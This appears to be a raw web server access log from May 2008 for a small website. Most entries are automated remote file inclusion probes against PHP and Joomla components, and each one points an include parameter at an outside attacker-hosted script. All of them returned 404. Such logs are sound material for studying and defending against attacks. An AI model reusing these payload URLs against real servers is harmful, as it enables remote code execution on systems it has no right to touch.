202.181.99.12 - - [18/May/2008:19:11:37 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
202.181.99.12 - - [18/May/2008:19:11:38 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:12:17 -0700] "GET //auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:12:17 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
72.47.239.77 - - [18/May/2008:19:12:41 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
207.7.108.240 - - [18/May/2008:19:13:17 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.7.108.240 - - [18/May/2008:19:13:17 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:13:19 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:13:19 -0700] "GET //auction/includes/converter.inc.php?include_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:13:33 -0700] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:13:33 -0700] "GET /logs/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
72.47.239.77 - - [18/May/2008:19:13:38 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.47.239.77 - - [18/May/2008:19:13:38 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.47.239.77 - - [18/May/2008:19:13:46 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://valorvirtual.com//on? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:14:58 -0700] "GET //inc/header.php/step_one.php?server_inc=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
66.225.217.194 - - [18/May/2008:19:14:58 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
66.225.217.194 - - [18/May/2008:19:14:58 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:14:59 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:15:36 -0700] "GET //avatar.php?page=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:15:51 -0700] "GET /logs//avatar.php?page=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:16:25 -0700] "GET //avatar.php?page=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:16:25 -0700] "GET /logs//avatar.php?page=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:16:50 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:16:50 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:16:51 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.246.51.45 - - [18/May/2008:19:17:00 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.246.51.45 - - [18/May/2008:19:17:00 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.6.28.161 - - [18/May/2008:19:17:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
67.195.58.185 - - [18/May/2008:19:17:01 -0700] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "neighborhoodglimpses.com"
67.43.4.60 - - [18/May/2008:19:17:51 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.43.4.60 - - [18/May/2008:19:17:52 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
208.76.107.242 - - [18/May/2008:19:17:57 -0700] "GET /index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:19:12 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:19:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:19:13 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:19:31 -0700] "GET /logs/access_080211.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:19:32 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:19:32 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.227.251.172 - - [18/May/2008:19:19:51 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:20:01 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:20:01 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:20:01 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.7.108.240 - - [18/May/2008:19:20:12 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:21:30 -0700] "GET /logs/access_080211.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:21:30 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:21:30 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:21:41 -0700] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:21:42 -0700] "GET //Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "neighborhoodglimpses.com"
66.249.73.227 - - [18/May/2008:19:21:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
66.249.73.227 - - [18/May/2008:19:21:57 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:23:00 -0700] "GET //Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:23:00 -0700] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:23:11 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:23:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:23:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
212.227.251.172 - - [18/May/2008:19:25:02 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
69.90.72.88 - - [18/May/2008:19:25:22 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
69.90.72.88 - - [18/May/2008:19:25:22 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:25:25 -0700] "GET //auction/includes/converter.inc.php?include_path=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:25:25 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:26:28 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:26:28 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:26:28 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:26:40 -0700] "GET //auction/includes/converter.inc.php?include_path=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:26:40 -0700] "GET /logs//auction/includes/converter.inc.php?include_path=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:19:28:12 -0700] "GET /logs/access_080211.log/index.php?go=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:19:28:17 -0700] "GET /index.php?go=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:19:28:22 -0700] "GET /logs/index.php?go=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:29:43 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
219.94.128.57 - - [18/May/2008:19:29:52 -0700] "GET /index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:31:37 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:31:37 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:31:38 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:31:38 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:31:38 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:31:38 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:31:38 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:31:38 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:31:39 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:31:40 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:31:40 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
74.55.112.34 - - [18/May/2008:19:31:43 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.55.112.34 - - [18/May/2008:19:31:43 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:32:12 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:32:12 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.23.179.9 - - [18/May/2008:19:32:18 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
216.23.179.9 - - [18/May/2008:19:32:18 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:32:18 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:32:18 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:32:19 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:32:19 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:32:20 -0700] "GET /logs/access_080414.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
80.67.24.2 - - [18/May/2008:19:32:32 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:33:12 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:33:15 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
